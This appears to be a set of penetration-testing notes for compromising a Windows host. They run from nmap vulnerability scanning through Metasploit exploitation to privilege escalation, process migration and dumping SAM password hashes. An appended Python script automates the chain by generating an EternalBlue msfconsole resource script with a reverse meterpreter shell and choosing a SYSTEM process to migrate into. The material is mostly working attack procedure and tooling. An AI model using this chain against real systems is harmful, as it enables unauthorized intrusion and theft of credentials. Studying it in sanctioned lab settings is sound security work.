Recon

  1. scan for open ports
  2. nmap -vv -sV --script vuln <ip>
49152/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49158/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49159/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
...
(NT_STATUS_ACCESS_DENIED means the check could not run without credentials, not that the host is patched; false means tested and not vulnerable; only a script that prints State: VULNERABLE is a confirmed hit)

Gain Access

  1. start metasploit (msfconsole)
  2. search for an exploit matching the vuln scan hit
  3. use <path to exploit>
  4. set RHOSTS <ip>
  5. set payload (a reverse payload also needs LHOST, and LPORT if not the default)
  6. run (or exploit), then check sessions for the new shell

Escalate

  1. convert shell to meterpreter
    1. background session, ctrl z
    2. use post/multi/manage/shell_to_meterpreter
    3. set required options (SESSION = id of the backgrounded shell)
    4. run, then interact with the new meterpreter session
  2. run getuid to see which user the session runs as, then getsystem to attempt escalation to SYSTEM (it tries several techniques and reports failure if none work)
  3. run shell to drop into a cmd shell when needed, exit returns to meterpreter
  4. run ps to list running processes with their owner, does a service process run as NT AUTHORITY\SYSTEM?
  5. migrate <process id> into a stable SYSTEM-owned process (not a critical one such as csrss or lsass); migrating into another user's process needs SeDebugPrivilege, so this comes after getsystem or from an admin session
  6. once running inside the higher-privileged process, run hashdump, which displays the password hashes stored in the SAM database (needs SYSTEM)
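Added example (mine, not part of these notes, of nmap or of Metasploit): a Python script that parses the nmap -vv -sV --script vuln output from Recon into open ports and host-script verdicts, renders the Gain Access steps as a msfconsole resource script, and applies the Escalate check (which listed process runs as SYSTEM?) to meterpreter ps output. The nmap and ps samples are constructed; the eternalblue module path, reverse_tcp payload, RHOSTS/LHOST values and PIDs are assumptions. It only emits exploit lines for a script that reports State: VULNERABLE, so an NT_STATUS_ACCESS_DENIED result (check could not run) is never treated as a hit.

```python
"""Added example, not part of the original notes: parse the Recon nmap output,
render the Gain Access steps as a msfconsole resource script, and pick a
migration target for Escalate from meterpreter ps output. Samples, module,
payload, addresses and PIDs are constructed assumptions."""
import re

# Constructed nmap -vv -sV --script vuln output; the ms17-010 verdict is
# invented for the demo (the notes above elide that result).
SAMPLE_NMAP = """\
PORT      STATE SERVICE       REASON          VERSION
445/tcp   open  microsoft-ds  syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds
49152/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|_    Risk factor: HIGH
"""
# -vv port lines carry a REASON column ("syn-ack ttl 128") before VERSION.
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"\s+(?P<reason>\S+(?: ttl \d+)?)(?:\s+(?P<version>.*))?$")
# Script results start "|_name: value" or "| name:"; continuation lines are
# indented further and so never match this.
SCRIPT_RE = re.compile(r"^\|[_ ](?P<name>[\w-]+):\s*(?P<value>.*)$")

def classify(lines):
    """Collapse one script result. NT_STATUS_ACCESS_DENIED means the check
    could not run unauthenticated, which is not the same as not vulnerable."""
    first, body = lines[0], " ".join(lines)
    if "State: VULNERABLE" in body or "State: LIKELY VULNERABLE" in body:
        return "VULNERABLE"
    if first.lower() == "false" or "State: NOT VULNERABLE" in body:
        return "not vulnerable"
    if first.startswith(("NT_STATUS_", "ERROR")):
        return "not tested (" + first + ")"
    return "unknown"

def parse_nmap(text):
    """Return (ports, verdicts): port dicts and host-script name -> verdict."""
    ports, raw, current, in_host = [], {}, None, False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append(m.groupdict())
            continue
        if line.startswith("Host script results:"):
            in_host = True
        elif in_host and line.startswith("|"):
            m = SCRIPT_RE.match(line)
            if m:
                current = m.group("name")
                raw[current] = [m.group("value").strip()]
            elif current:
                raw[current].append(line.lstrip("|_ ").strip())
    return ports, {name: classify(lines) for name, lines in raw.items()}

# Hypothetical script -> module table standing in for the "search" step.
MODULE_FOR = {"smb-vuln-ms17-010": "exploit/windows/smb/ms17_010_eternalblue"}

def render_rc(verdicts, rhost, lhost, lport=4444,
              payload="windows/x64/meterpreter/reverse_tcp"):
    """Resource script for msfconsole -r, one module per confirmed hit.
    Returns '' when nothing is confirmed, so an ACCESS_DENIED never fires."""
    out = []
    for name, verdict in verdicts.items():
        module = MODULE_FOR.get(name)
        if verdict == "VULNERABLE" and module:
            out += [f"use {module}", f"set RHOSTS {rhost}", f"set PAYLOAD {payload}",
                    f"set LHOST {lhost}", f"set LPORT {lport}",
                    "exploit -z"]  # -z: keep the session but don't interact yet
    return "\n".join(out) + ("\n" if out else "")

# Constructed meterpreter ps output (raw string, backslashes are literal).
SAMPLE_PS = r"""
 PID   PPID  Name          Arch  Session  User                 Path
 356   4     smss.exe      x64   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
 448   440   csrss.exe     x64   0        NT AUTHORITY\SYSTEM  C:\Windows\system32\csrss.exe
 500   440   winlogon.exe  x64   1        NT AUTHORITY\SYSTEM  C:\Windows\system32\winlogon.exe
 2288  1880  explorer.exe  x64   1        WIN7\bob             C:\Windows\Explorer.EXE
"""
PS_RE = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S+)\s+(?P<arch>x64|x86)\s+"
    r"(?P<session>\d+)\s+(?P<user>.+?)\s+(?P<path>(?:[A-Za-z]:\\|\\).*)$")
# Critical processes to leave alone: killing them hangs or bluescreens the
# host, and lsass is heavily monitored and often a protected process.
AVOID = {"smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe"}

def pick_migration_target(ps_text, arch="x64"):
    """PID of a SYSTEM-owned, same-arch, non-critical process, or None."""
    for line in ps_text.splitlines():
        m = PS_RE.match(line)
        if (m and m.group("user").upper() == r"NT AUTHORITY\SYSTEM"
                and m.group("arch") == arch and m.group("name").lower() not in AVOID):
            return int(m.group("pid"))
    return None
```

Write render_rc's output to a file and run it with msfconsole -r <file>; the shell-to-meterpreter conversion, getuid/getsystem and hashdump stay interactive in the session. After getsystem, feed the ps listing to pick_migration_target and migrate to the PID it returns; it skips processes whose death takes the box down and only picks the session's own architecture, since migrating x64 meterpreter into an x86 process fails.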
Last modified 2023.11.02